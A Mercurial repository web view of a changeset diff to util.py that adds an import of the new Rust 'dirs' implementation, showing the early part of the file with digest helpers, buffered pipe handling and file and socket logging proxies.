##// END OF EJS Templates
rust-dirstate: call new "dirs" rust implementation from Python...
Raphaël Gomès -
r42738:f5ef8c85 default draft
parent child Browse files
Show More
@@ -1,3318 +1,3323 b''
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 25 import mmap
26 26 import os
27 27 import platform as pyplatform
28 28 import re as remod
29 29 import shutil
30 30 import socket
31 31 import stat
32 32 import sys
33 33 import time
34 34 import traceback
35 35 import warnings
36 36
37 37 from .thirdparty import (
38 38 attr,
39 39 )
40 40 from hgdemandimport import tracing
41 41 from . import (
42 42 encoding,
43 43 error,
44 44 i18n,
45 45 node as nodemod,
46 46 policy,
47 47 pycompat,
48 48 urllibcompat,
49 49 )
50 50 from .utils import (
51 51 compression,
52 52 procutil,
53 53 stringutil,
54 54 )
55 55
56 rustdirs = policy.importrust('dirstate', 'Dirs')
57
56 58 base85 = policy.importmod(r'base85')
57 59 osutil = policy.importmod(r'osutil')
58 60 parsers = policy.importmod(r'parsers')
59 61
60 62 b85decode = base85.b85decode
61 63 b85encode = base85.b85encode
62 64
63 65 cookielib = pycompat.cookielib
64 66 httplib = pycompat.httplib
65 67 pickle = pycompat.pickle
66 68 safehasattr = pycompat.safehasattr
67 69 socketserver = pycompat.socketserver
68 70 bytesio = pycompat.bytesio
69 71 # TODO deprecate stringio name, as it is a lie on Python 3.
70 72 stringio = bytesio
71 73 xmlrpclib = pycompat.xmlrpclib
72 74
73 75 httpserver = urllibcompat.httpserver
74 76 urlerr = urllibcompat.urlerr
75 77 urlreq = urllibcompat.urlreq
76 78
77 79 # workaround for win32mbcs
78 80 _filenamebytestr = pycompat.bytestr
79 81
80 82 if pycompat.iswindows:
81 83 from . import windows as platform
82 84 else:
83 85 from . import posix as platform
84 86
85 87 _ = i18n._
86 88
87 89 bindunixsocket = platform.bindunixsocket
88 90 cachestat = platform.cachestat
89 91 checkexec = platform.checkexec
90 92 checklink = platform.checklink
91 93 copymode = platform.copymode
92 94 expandglobs = platform.expandglobs
93 95 getfsmountpoint = platform.getfsmountpoint
94 96 getfstype = platform.getfstype
95 97 groupmembers = platform.groupmembers
96 98 groupname = platform.groupname
97 99 isexec = platform.isexec
98 100 isowner = platform.isowner
99 101 listdir = osutil.listdir
100 102 localpath = platform.localpath
101 103 lookupreg = platform.lookupreg
102 104 makedir = platform.makedir
103 105 nlinks = platform.nlinks
104 106 normpath = platform.normpath
105 107 normcase = platform.normcase
106 108 normcasespec = platform.normcasespec
107 109 normcasefallback = platform.normcasefallback
108 110 openhardlinks = platform.openhardlinks
109 111 oslink = platform.oslink
110 112 parsepatchoutput = platform.parsepatchoutput
111 113 pconvert = platform.pconvert
112 114 poll = platform.poll
113 115 posixfile = platform.posixfile
114 116 readlink = platform.readlink
115 117 rename = platform.rename
116 118 removedirs = platform.removedirs
117 119 samedevice = platform.samedevice
118 120 samefile = platform.samefile
119 121 samestat = platform.samestat
120 122 setflags = platform.setflags
121 123 split = platform.split
122 124 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 125 statisexec = platform.statisexec
124 126 statislink = platform.statislink
125 127 umask = platform.umask
126 128 unlink = platform.unlink
127 129 username = platform.username
128 130
129 131 # small compat layer
130 132 compengines = compression.compengines
131 133 SERVERROLE = compression.SERVERROLE
132 134 CLIENTROLE = compression.CLIENTROLE
133 135
134 136 try:
135 137 recvfds = osutil.recvfds
136 138 except AttributeError:
137 139 pass
138 140
139 141 # Python compatibility
140 142
141 143 _notset = object()
142 144
143 145 def bitsfrom(container):
144 146 bits = 0
145 147 for bit in container:
146 148 bits |= bit
147 149 return bits
148 150
149 151 # python 2.6 still have deprecation warning enabled by default. We do not want
150 152 # to display anything to standard user so detect if we are running test and
151 153 # only use python deprecation warning in this case.
152 154 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
153 155 if _dowarn:
154 156 # explicitly unfilter our warning for python 2.7
155 157 #
156 158 # The option of setting PYTHONWARNINGS in the test runner was investigated.
157 159 # However, module name set through PYTHONWARNINGS was exactly matched, so
158 160 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
159 161 # makes the whole PYTHONWARNINGS thing useless for our usecase.
160 162 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
161 163 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
162 164 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
163 165 if _dowarn and pycompat.ispy3:
164 166 # silence warning emitted by passing user string to re.sub()
165 167 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
166 168 r'mercurial')
167 169 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
168 170 DeprecationWarning, r'mercurial')
169 171 # TODO: reinvent imp.is_frozen()
170 172 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
171 173 DeprecationWarning, r'mercurial')
172 174
173 175 def nouideprecwarn(msg, version, stacklevel=1):
174 176 """Issue an python native deprecation warning
175 177
176 178 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
177 179 """
178 180 if _dowarn:
179 181 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
180 182 " update your code.)") % version
181 183 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
182 184
183 185 DIGESTS = {
184 186 'md5': hashlib.md5,
185 187 'sha1': hashlib.sha1,
186 188 'sha512': hashlib.sha512,
187 189 }
188 190 # List of digest types from strongest to weakest
189 191 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
190 192
191 193 for k in DIGESTS_BY_STRENGTH:
192 194 assert k in DIGESTS
193 195
194 196 class digester(object):
195 197 """helper to compute digests.
196 198
197 199 This helper can be used to compute one or more digests given their name.
198 200
199 201 >>> d = digester([b'md5', b'sha1'])
200 202 >>> d.update(b'foo')
201 203 >>> [k for k in sorted(d)]
202 204 ['md5', 'sha1']
203 205 >>> d[b'md5']
204 206 'acbd18db4cc2f85cedef654fccc4a4d8'
205 207 >>> d[b'sha1']
206 208 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
207 209 >>> digester.preferred([b'md5', b'sha1'])
208 210 'sha1'
209 211 """
210 212
211 213 def __init__(self, digests, s=''):
212 214 self._hashes = {}
213 215 for k in digests:
214 216 if k not in DIGESTS:
215 217 raise error.Abort(_('unknown digest type: %s') % k)
216 218 self._hashes[k] = DIGESTS[k]()
217 219 if s:
218 220 self.update(s)
219 221
220 222 def update(self, data):
221 223 for h in self._hashes.values():
222 224 h.update(data)
223 225
224 226 def __getitem__(self, key):
225 227 if key not in DIGESTS:
226 228 raise error.Abort(_('unknown digest type: %s') % k)
227 229 return nodemod.hex(self._hashes[key].digest())
228 230
229 231 def __iter__(self):
230 232 return iter(self._hashes)
231 233
232 234 @staticmethod
233 235 def preferred(supported):
234 236 """returns the strongest digest type in both supported and DIGESTS."""
235 237
236 238 for k in DIGESTS_BY_STRENGTH:
237 239 if k in supported:
238 240 return k
239 241 return None
240 242
241 243 class digestchecker(object):
242 244 """file handle wrapper that additionally checks content against a given
243 245 size and digests.
244 246
245 247 d = digestchecker(fh, size, {'md5': '...'})
246 248
247 249 When multiple digests are given, all of them are validated.
248 250 """
249 251
250 252 def __init__(self, fh, size, digests):
251 253 self._fh = fh
252 254 self._size = size
253 255 self._got = 0
254 256 self._digests = dict(digests)
255 257 self._digester = digester(self._digests.keys())
256 258
257 259 def read(self, length=-1):
258 260 content = self._fh.read(length)
259 261 self._digester.update(content)
260 262 self._got += len(content)
261 263 return content
262 264
263 265 def validate(self):
264 266 if self._size != self._got:
265 267 raise error.Abort(_('size mismatch: expected %d, got %d') %
266 268 (self._size, self._got))
267 269 for k, v in self._digests.items():
268 270 if v != self._digester[k]:
269 271 # i18n: first parameter is a digest name
270 272 raise error.Abort(_('%s mismatch: expected %s, got %s') %
271 273 (k, v, self._digester[k]))
272 274
273 275 try:
274 276 buffer = buffer
275 277 except NameError:
276 278 def buffer(sliceable, offset=0, length=None):
277 279 if length is not None:
278 280 return memoryview(sliceable)[offset:offset + length]
279 281 return memoryview(sliceable)[offset:]
280 282
281 283 _chunksize = 4096
282 284
283 285 class bufferedinputpipe(object):
284 286 """a manually buffered input pipe
285 287
286 288 Python will not let us use buffered IO and lazy reading with 'polling' at
287 289 the same time. We cannot probe the buffer state and select will not detect
288 290 that data are ready to read if they are already buffered.
289 291
290 292 This class let us work around that by implementing its own buffering
291 293 (allowing efficient readline) while offering a way to know if the buffer is
292 294 empty from the output (allowing collaboration of the buffer with polling).
293 295
294 296 This class lives in the 'util' module because it makes use of the 'os'
295 297 module from the python stdlib.
296 298 """
297 299 def __new__(cls, fh):
298 300 # If we receive a fileobjectproxy, we need to use a variation of this
299 301 # class that notifies observers about activity.
300 302 if isinstance(fh, fileobjectproxy):
301 303 cls = observedbufferedinputpipe
302 304
303 305 return super(bufferedinputpipe, cls).__new__(cls)
304 306
305 307 def __init__(self, input):
306 308 self._input = input
307 309 self._buffer = []
308 310 self._eof = False
309 311 self._lenbuf = 0
310 312
311 313 @property
312 314 def hasbuffer(self):
313 315 """True is any data is currently buffered
314 316
315 317 This will be used externally a pre-step for polling IO. If there is
316 318 already data then no polling should be set in place."""
317 319 return bool(self._buffer)
318 320
319 321 @property
320 322 def closed(self):
321 323 return self._input.closed
322 324
323 325 def fileno(self):
324 326 return self._input.fileno()
325 327
326 328 def close(self):
327 329 return self._input.close()
328 330
329 331 def read(self, size):
330 332 while (not self._eof) and (self._lenbuf < size):
331 333 self._fillbuffer()
332 334 return self._frombuffer(size)
333 335
334 336 def unbufferedread(self, size):
335 337 if not self._eof and self._lenbuf == 0:
336 338 self._fillbuffer(max(size, _chunksize))
337 339 return self._frombuffer(min(self._lenbuf, size))
338 340
339 341 def readline(self, *args, **kwargs):
340 342 if len(self._buffer) > 1:
341 343 # this should not happen because both read and readline end with a
342 344 # _frombuffer call that collapse it.
343 345 self._buffer = [''.join(self._buffer)]
344 346 self._lenbuf = len(self._buffer[0])
345 347 lfi = -1
346 348 if self._buffer:
347 349 lfi = self._buffer[-1].find('\n')
348 350 while (not self._eof) and lfi < 0:
349 351 self._fillbuffer()
350 352 if self._buffer:
351 353 lfi = self._buffer[-1].find('\n')
352 354 size = lfi + 1
353 355 if lfi < 0: # end of file
354 356 size = self._lenbuf
355 357 elif len(self._buffer) > 1:
356 358 # we need to take previous chunks into account
357 359 size += self._lenbuf - len(self._buffer[-1])
358 360 return self._frombuffer(size)
359 361
360 362 def _frombuffer(self, size):
361 363 """return at most 'size' data from the buffer
362 364
363 365 The data are removed from the buffer."""
364 366 if size == 0 or not self._buffer:
365 367 return ''
366 368 buf = self._buffer[0]
367 369 if len(self._buffer) > 1:
368 370 buf = ''.join(self._buffer)
369 371
370 372 data = buf[:size]
371 373 buf = buf[len(data):]
372 374 if buf:
373 375 self._buffer = [buf]
374 376 self._lenbuf = len(buf)
375 377 else:
376 378 self._buffer = []
377 379 self._lenbuf = 0
378 380 return data
379 381
380 382 def _fillbuffer(self, size=_chunksize):
381 383 """read data to the buffer"""
382 384 data = os.read(self._input.fileno(), size)
383 385 if not data:
384 386 self._eof = True
385 387 else:
386 388 self._lenbuf += len(data)
387 389 self._buffer.append(data)
388 390
389 391 return data
390 392
391 393 def mmapread(fp):
392 394 try:
393 395 fd = getattr(fp, 'fileno', lambda: fp)()
394 396 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
395 397 except ValueError:
396 398 # Empty files cannot be mmapped, but mmapread should still work. Check
397 399 # if the file is empty, and if so, return an empty buffer.
398 400 if os.fstat(fd).st_size == 0:
399 401 return ''
400 402 raise
401 403
402 404 class fileobjectproxy(object):
403 405 """A proxy around file objects that tells a watcher when events occur.
404 406
405 407 This type is intended to only be used for testing purposes. Think hard
406 408 before using it in important code.
407 409 """
408 410 __slots__ = (
409 411 r'_orig',
410 412 r'_observer',
411 413 )
412 414
413 415 def __init__(self, fh, observer):
414 416 object.__setattr__(self, r'_orig', fh)
415 417 object.__setattr__(self, r'_observer', observer)
416 418
417 419 def __getattribute__(self, name):
418 420 ours = {
419 421 r'_observer',
420 422
421 423 # IOBase
422 424 r'close',
423 425 # closed if a property
424 426 r'fileno',
425 427 r'flush',
426 428 r'isatty',
427 429 r'readable',
428 430 r'readline',
429 431 r'readlines',
430 432 r'seek',
431 433 r'seekable',
432 434 r'tell',
433 435 r'truncate',
434 436 r'writable',
435 437 r'writelines',
436 438 # RawIOBase
437 439 r'read',
438 440 r'readall',
439 441 r'readinto',
440 442 r'write',
441 443 # BufferedIOBase
442 444 # raw is a property
443 445 r'detach',
444 446 # read defined above
445 447 r'read1',
446 448 # readinto defined above
447 449 # write defined above
448 450 }
449 451
450 452 # We only observe some methods.
451 453 if name in ours:
452 454 return object.__getattribute__(self, name)
453 455
454 456 return getattr(object.__getattribute__(self, r'_orig'), name)
455 457
456 458 def __nonzero__(self):
457 459 return bool(object.__getattribute__(self, r'_orig'))
458 460
459 461 __bool__ = __nonzero__
460 462
461 463 def __delattr__(self, name):
462 464 return delattr(object.__getattribute__(self, r'_orig'), name)
463 465
464 466 def __setattr__(self, name, value):
465 467 return setattr(object.__getattribute__(self, r'_orig'), name, value)
466 468
467 469 def __iter__(self):
468 470 return object.__getattribute__(self, r'_orig').__iter__()
469 471
470 472 def _observedcall(self, name, *args, **kwargs):
471 473 # Call the original object.
472 474 orig = object.__getattribute__(self, r'_orig')
473 475 res = getattr(orig, name)(*args, **kwargs)
474 476
475 477 # Call a method on the observer of the same name with arguments
476 478 # so it can react, log, etc.
477 479 observer = object.__getattribute__(self, r'_observer')
478 480 fn = getattr(observer, name, None)
479 481 if fn:
480 482 fn(res, *args, **kwargs)
481 483
482 484 return res
483 485
484 486 def close(self, *args, **kwargs):
485 487 return object.__getattribute__(self, r'_observedcall')(
486 488 r'close', *args, **kwargs)
487 489
488 490 def fileno(self, *args, **kwargs):
489 491 return object.__getattribute__(self, r'_observedcall')(
490 492 r'fileno', *args, **kwargs)
491 493
492 494 def flush(self, *args, **kwargs):
493 495 return object.__getattribute__(self, r'_observedcall')(
494 496 r'flush', *args, **kwargs)
495 497
496 498 def isatty(self, *args, **kwargs):
497 499 return object.__getattribute__(self, r'_observedcall')(
498 500 r'isatty', *args, **kwargs)
499 501
500 502 def readable(self, *args, **kwargs):
501 503 return object.__getattribute__(self, r'_observedcall')(
502 504 r'readable', *args, **kwargs)
503 505
504 506 def readline(self, *args, **kwargs):
505 507 return object.__getattribute__(self, r'_observedcall')(
506 508 r'readline', *args, **kwargs)
507 509
508 510 def readlines(self, *args, **kwargs):
509 511 return object.__getattribute__(self, r'_observedcall')(
510 512 r'readlines', *args, **kwargs)
511 513
512 514 def seek(self, *args, **kwargs):
513 515 return object.__getattribute__(self, r'_observedcall')(
514 516 r'seek', *args, **kwargs)
515 517
516 518 def seekable(self, *args, **kwargs):
517 519 return object.__getattribute__(self, r'_observedcall')(
518 520 r'seekable', *args, **kwargs)
519 521
520 522 def tell(self, *args, **kwargs):
521 523 return object.__getattribute__(self, r'_observedcall')(
522 524 r'tell', *args, **kwargs)
523 525
524 526 def truncate(self, *args, **kwargs):
525 527 return object.__getattribute__(self, r'_observedcall')(
526 528 r'truncate', *args, **kwargs)
527 529
528 530 def writable(self, *args, **kwargs):
529 531 return object.__getattribute__(self, r'_observedcall')(
530 532 r'writable', *args, **kwargs)
531 533
532 534 def writelines(self, *args, **kwargs):
533 535 return object.__getattribute__(self, r'_observedcall')(
534 536 r'writelines', *args, **kwargs)
535 537
536 538 def read(self, *args, **kwargs):
537 539 return object.__getattribute__(self, r'_observedcall')(
538 540 r'read', *args, **kwargs)
539 541
540 542 def readall(self, *args, **kwargs):
541 543 return object.__getattribute__(self, r'_observedcall')(
542 544 r'readall', *args, **kwargs)
543 545
544 546 def readinto(self, *args, **kwargs):
545 547 return object.__getattribute__(self, r'_observedcall')(
546 548 r'readinto', *args, **kwargs)
547 549
548 550 def write(self, *args, **kwargs):
549 551 return object.__getattribute__(self, r'_observedcall')(
550 552 r'write', *args, **kwargs)
551 553
552 554 def detach(self, *args, **kwargs):
553 555 return object.__getattribute__(self, r'_observedcall')(
554 556 r'detach', *args, **kwargs)
555 557
556 558 def read1(self, *args, **kwargs):
557 559 return object.__getattribute__(self, r'_observedcall')(
558 560 r'read1', *args, **kwargs)
559 561
560 562 class observedbufferedinputpipe(bufferedinputpipe):
561 563 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
562 564
563 565 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
564 566 bypass ``fileobjectproxy``. Because of this, we need to make
565 567 ``bufferedinputpipe`` aware of these operations.
566 568
567 569 This variation of ``bufferedinputpipe`` can notify observers about
568 570 ``os.read()`` events. It also re-publishes other events, such as
569 571 ``read()`` and ``readline()``.
570 572 """
571 573 def _fillbuffer(self):
572 574 res = super(observedbufferedinputpipe, self)._fillbuffer()
573 575
574 576 fn = getattr(self._input._observer, r'osread', None)
575 577 if fn:
576 578 fn(res, _chunksize)
577 579
578 580 return res
579 581
580 582 # We use different observer methods because the operation isn't
581 583 # performed on the actual file object but on us.
582 584 def read(self, size):
583 585 res = super(observedbufferedinputpipe, self).read(size)
584 586
585 587 fn = getattr(self._input._observer, r'bufferedread', None)
586 588 if fn:
587 589 fn(res, size)
588 590
589 591 return res
590 592
591 593 def readline(self, *args, **kwargs):
592 594 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
593 595
594 596 fn = getattr(self._input._observer, r'bufferedreadline', None)
595 597 if fn:
596 598 fn(res)
597 599
598 600 return res
599 601
600 602 PROXIED_SOCKET_METHODS = {
601 603 r'makefile',
602 604 r'recv',
603 605 r'recvfrom',
604 606 r'recvfrom_into',
605 607 r'recv_into',
606 608 r'send',
607 609 r'sendall',
608 610 r'sendto',
609 611 r'setblocking',
610 612 r'settimeout',
611 613 r'gettimeout',
612 614 r'setsockopt',
613 615 }
614 616
615 617 class socketproxy(object):
616 618 """A proxy around a socket that tells a watcher when events occur.
617 619
618 620 This is like ``fileobjectproxy`` except for sockets.
619 621
620 622 This type is intended to only be used for testing purposes. Think hard
621 623 before using it in important code.
622 624 """
623 625 __slots__ = (
624 626 r'_orig',
625 627 r'_observer',
626 628 )
627 629
628 630 def __init__(self, sock, observer):
629 631 object.__setattr__(self, r'_orig', sock)
630 632 object.__setattr__(self, r'_observer', observer)
631 633
632 634 def __getattribute__(self, name):
633 635 if name in PROXIED_SOCKET_METHODS:
634 636 return object.__getattribute__(self, name)
635 637
636 638 return getattr(object.__getattribute__(self, r'_orig'), name)
637 639
638 640 def __delattr__(self, name):
639 641 return delattr(object.__getattribute__(self, r'_orig'), name)
640 642
641 643 def __setattr__(self, name, value):
642 644 return setattr(object.__getattribute__(self, r'_orig'), name, value)
643 645
644 646 def __nonzero__(self):
645 647 return bool(object.__getattribute__(self, r'_orig'))
646 648
647 649 __bool__ = __nonzero__
648 650
649 651 def _observedcall(self, name, *args, **kwargs):
650 652 # Call the original object.
651 653 orig = object.__getattribute__(self, r'_orig')
652 654 res = getattr(orig, name)(*args, **kwargs)
653 655
654 656 # Call a method on the observer of the same name with arguments
655 657 # so it can react, log, etc.
656 658 observer = object.__getattribute__(self, r'_observer')
657 659 fn = getattr(observer, name, None)
658 660 if fn:
659 661 fn(res, *args, **kwargs)
660 662
661 663 return res
662 664
663 665 def makefile(self, *args, **kwargs):
664 666 res = object.__getattribute__(self, r'_observedcall')(
665 667 r'makefile', *args, **kwargs)
666 668
667 669 # The file object may be used for I/O. So we turn it into a
668 670 # proxy using our observer.
669 671 observer = object.__getattribute__(self, r'_observer')
670 672 return makeloggingfileobject(observer.fh, res, observer.name,
671 673 reads=observer.reads,
672 674 writes=observer.writes,
673 675 logdata=observer.logdata,
674 676 logdataapis=observer.logdataapis)
675 677
676 678 def recv(self, *args, **kwargs):
677 679 return object.__getattribute__(self, r'_observedcall')(
678 680 r'recv', *args, **kwargs)
679 681
680 682 def recvfrom(self, *args, **kwargs):
681 683 return object.__getattribute__(self, r'_observedcall')(
682 684 r'recvfrom', *args, **kwargs)
683 685
684 686 def recvfrom_into(self, *args, **kwargs):
685 687 return object.__getattribute__(self, r'_observedcall')(
686 688 r'recvfrom_into', *args, **kwargs)
687 689
688 690 def recv_into(self, *args, **kwargs):
689 691 return object.__getattribute__(self, r'_observedcall')(
690 692 r'recv_info', *args, **kwargs)
691 693
692 694 def send(self, *args, **kwargs):
693 695 return object.__getattribute__(self, r'_observedcall')(
694 696 r'send', *args, **kwargs)
695 697
696 698 def sendall(self, *args, **kwargs):
697 699 return object.__getattribute__(self, r'_observedcall')(
698 700 r'sendall', *args, **kwargs)
699 701
700 702 def sendto(self, *args, **kwargs):
701 703 return object.__getattribute__(self, r'_observedcall')(
702 704 r'sendto', *args, **kwargs)
703 705
704 706 def setblocking(self, *args, **kwargs):
705 707 return object.__getattribute__(self, r'_observedcall')(
706 708 r'setblocking', *args, **kwargs)
707 709
708 710 def settimeout(self, *args, **kwargs):
709 711 return object.__getattribute__(self, r'_observedcall')(
710 712 r'settimeout', *args, **kwargs)
711 713
712 714 def gettimeout(self, *args, **kwargs):
713 715 return object.__getattribute__(self, r'_observedcall')(
714 716 r'gettimeout', *args, **kwargs)
715 717
716 718 def setsockopt(self, *args, **kwargs):
717 719 return object.__getattribute__(self, r'_observedcall')(
718 720 r'setsockopt', *args, **kwargs)
719 721
720 722 class baseproxyobserver(object):
721 723 def _writedata(self, data):
722 724 if not self.logdata:
723 725 if self.logdataapis:
724 726 self.fh.write('\n')
725 727 self.fh.flush()
726 728 return
727 729
728 730 # Simple case writes all data on a single line.
729 731 if b'\n' not in data:
730 732 if self.logdataapis:
731 733 self.fh.write(': %s\n' % stringutil.escapestr(data))
732 734 else:
733 735 self.fh.write('%s> %s\n'
734 736 % (self.name, stringutil.escapestr(data)))
735 737 self.fh.flush()
736 738 return
737 739
738 740 # Data with newlines is written to multiple lines.
739 741 if self.logdataapis:
740 742 self.fh.write(':\n')
741 743
742 744 lines = data.splitlines(True)
743 745 for line in lines:
744 746 self.fh.write('%s> %s\n'
745 747 % (self.name, stringutil.escapestr(line)))
746 748 self.fh.flush()
747 749
748 750 class fileobjectobserver(baseproxyobserver):
749 751 """Logs file object activity."""
750 752 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
751 753 logdataapis=True):
752 754 self.fh = fh
753 755 self.name = name
754 756 self.logdata = logdata
755 757 self.logdataapis = logdataapis
756 758 self.reads = reads
757 759 self.writes = writes
758 760
759 761 def read(self, res, size=-1):
760 762 if not self.reads:
761 763 return
762 764 # Python 3 can return None from reads at EOF instead of empty strings.
763 765 if res is None:
764 766 res = ''
765 767
766 768 if size == -1 and res == '':
767 769 # Suppress pointless read(-1) calls that return
768 770 # nothing. These happen _a lot_ on Python 3, and there
769 771 # doesn't seem to be a better workaround to have matching
770 772 # Python 2 and 3 behavior. :(
771 773 return
772 774
773 775 if self.logdataapis:
774 776 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
775 777
776 778 self._writedata(res)
777 779
778 780 def readline(self, res, limit=-1):
779 781 if not self.reads:
780 782 return
781 783
782 784 if self.logdataapis:
783 785 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
784 786
785 787 self._writedata(res)
786 788
787 789 def readinto(self, res, dest):
788 790 if not self.reads:
789 791 return
790 792
791 793 if self.logdataapis:
792 794 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
793 795 res))
794 796
795 797 data = dest[0:res] if res is not None else b''
796 798
797 799 # _writedata() uses "in" operator and is confused by memoryview because
798 800 # characters are ints on Python 3.
799 801 if isinstance(data, memoryview):
800 802 data = data.tobytes()
801 803
802 804 self._writedata(data)
803 805
804 806 def write(self, res, data):
805 807 if not self.writes:
806 808 return
807 809
808 810 # Python 2 returns None from some write() calls. Python 3 (reasonably)
809 811 # returns the integer bytes written.
810 812 if res is None and data:
811 813 res = len(data)
812 814
813 815 if self.logdataapis:
814 816 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
815 817
816 818 self._writedata(data)
817 819
818 820 def flush(self, res):
819 821 if not self.writes:
820 822 return
821 823
822 824 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
823 825
824 826 # For observedbufferedinputpipe.
825 827 def bufferedread(self, res, size):
826 828 if not self.reads:
827 829 return
828 830
829 831 if self.logdataapis:
830 832 self.fh.write('%s> bufferedread(%d) -> %d' % (
831 833 self.name, size, len(res)))
832 834
833 835 self._writedata(res)
834 836
835 837 def bufferedreadline(self, res):
836 838 if not self.reads:
837 839 return
838 840
839 841 if self.logdataapis:
840 842 self.fh.write('%s> bufferedreadline() -> %d' % (
841 843 self.name, len(res)))
842 844
843 845 self._writedata(res)
844 846
845 847 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
846 848 logdata=False, logdataapis=True):
847 849 """Turn a file object into a logging file object."""
848 850
849 851 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
850 852 logdata=logdata, logdataapis=logdataapis)
851 853 return fileobjectproxy(fh, observer)
852 854
853 855 class socketobserver(baseproxyobserver):
854 856 """Logs socket activity."""
855 857 def __init__(self, fh, name, reads=True, writes=True, states=True,
856 858 logdata=False, logdataapis=True):
857 859 self.fh = fh
858 860 self.name = name
859 861 self.reads = reads
860 862 self.writes = writes
861 863 self.states = states
862 864 self.logdata = logdata
863 865 self.logdataapis = logdataapis
864 866
865 867 def makefile(self, res, mode=None, bufsize=None):
866 868 if not self.states:
867 869 return
868 870
869 871 self.fh.write('%s> makefile(%r, %r)\n' % (
870 872 self.name, mode, bufsize))
871 873
872 874 def recv(self, res, size, flags=0):
873 875 if not self.reads:
874 876 return
875 877
876 878 if self.logdataapis:
877 879 self.fh.write('%s> recv(%d, %d) -> %d' % (
878 880 self.name, size, flags, len(res)))
879 881 self._writedata(res)
880 882
881 883 def recvfrom(self, res, size, flags=0):
882 884 if not self.reads:
883 885 return
884 886
885 887 if self.logdataapis:
886 888 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
887 889 self.name, size, flags, len(res[0])))
888 890
889 891 self._writedata(res[0])
890 892
891 893 def recvfrom_into(self, res, buf, size, flags=0):
892 894 if not self.reads:
893 895 return
894 896
895 897 if self.logdataapis:
896 898 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
897 899 self.name, size, flags, res[0]))
898 900
899 901 self._writedata(buf[0:res[0]])
900 902
901 903 def recv_into(self, res, buf, size=0, flags=0):
902 904 if not self.reads:
903 905 return
904 906
905 907 if self.logdataapis:
906 908 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
907 909 self.name, size, flags, res))
908 910
909 911 self._writedata(buf[0:res])
910 912
911 913 def send(self, res, data, flags=0):
912 914 if not self.writes:
913 915 return
914 916
915 917 self.fh.write('%s> send(%d, %d) -> %d' % (
916 918 self.name, len(data), flags, len(res)))
917 919 self._writedata(data)
918 920
919 921 def sendall(self, res, data, flags=0):
920 922 if not self.writes:
921 923 return
922 924
923 925 if self.logdataapis:
924 926 # Returns None on success. So don't bother reporting return value.
925 927 self.fh.write('%s> sendall(%d, %d)' % (
926 928 self.name, len(data), flags))
927 929
928 930 self._writedata(data)
929 931
930 932 def sendto(self, res, data, flagsoraddress, address=None):
931 933 if not self.writes:
932 934 return
933 935
934 936 if address:
935 937 flags = flagsoraddress
936 938 else:
937 939 flags = 0
938 940
939 941 if self.logdataapis:
940 942 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
941 943 self.name, len(data), flags, address, res))
942 944
943 945 self._writedata(data)
944 946
945 947 def setblocking(self, res, flag):
946 948 if not self.states:
947 949 return
948 950
949 951 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
950 952
951 953 def settimeout(self, res, value):
952 954 if not self.states:
953 955 return
954 956
955 957 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
956 958
957 959 def gettimeout(self, res):
958 960 if not self.states:
959 961 return
960 962
961 963 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
962 964
963 965 def setsockopt(self, res, level, optname, value):
964 966 if not self.states:
965 967 return
966 968
967 969 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
968 970 self.name, level, optname, value, res))
969 971
970 972 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
971 973 logdata=False, logdataapis=True):
972 974 """Turn a socket into a logging socket."""
973 975
974 976 observer = socketobserver(logh, name, reads=reads, writes=writes,
975 977 states=states, logdata=logdata,
976 978 logdataapis=logdataapis)
977 979 return socketproxy(fh, observer)
978 980
979 981 def version():
980 982 """Return version information if available."""
981 983 try:
982 984 from . import __version__
983 985 return __version__.version
984 986 except ImportError:
985 987 return 'unknown'
986 988
987 989 def versiontuple(v=None, n=4):
988 990 """Parses a Mercurial version string into an N-tuple.
989 991
990 992 The version string to be parsed is specified with the ``v`` argument.
991 993 If it isn't defined, the current Mercurial version string will be parsed.
992 994
993 995 ``n`` can be 2, 3, or 4. Here is how some version strings map to
994 996 returned values:
995 997
996 998 >>> v = b'3.6.1+190-df9b73d2d444'
